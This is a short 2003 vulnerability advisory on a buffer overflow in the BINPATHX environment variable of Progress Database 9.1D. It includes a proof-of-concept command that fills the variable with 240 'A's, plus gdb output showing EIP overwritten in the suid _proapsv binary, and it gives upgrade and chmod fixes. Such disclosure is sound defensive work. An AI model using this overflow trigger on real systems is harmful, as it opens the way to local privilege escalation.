16th Apr 2003 [SBWID-6160]
Progress Database unchecked buffer in BINPATHX leads to overflow
v9.1D up to 9.1D05
In Secure Network Operations, Inc. Strategic Reconnaissance Team
advisory SRT2003-04-15-1029 [http://www.secnetops.com]:
With version 9.1D several things have changed in the Progress codebase.
One such change is the addition of the BINPATHX variable. At the first
glance the BINPATHX variable appears to tell Progress binaries where to
find shared library files and other installation files. Unfortunately
while reading the variable no bounds checking is done. If an attacker
supplies enough data an overflow will occur thus overwriting critical
memory registers including the eip.
[email protected] rootme $ export BINPATHX=`perl -e 'print "A" x 240'`
[email protected] rootme $ gdb -q /usr/dlc/bin/_proapsv
Starting program: /usr/dlc/bin/_proapsv
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
#0 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
install 9.1D05 or chmod -s all suid binaries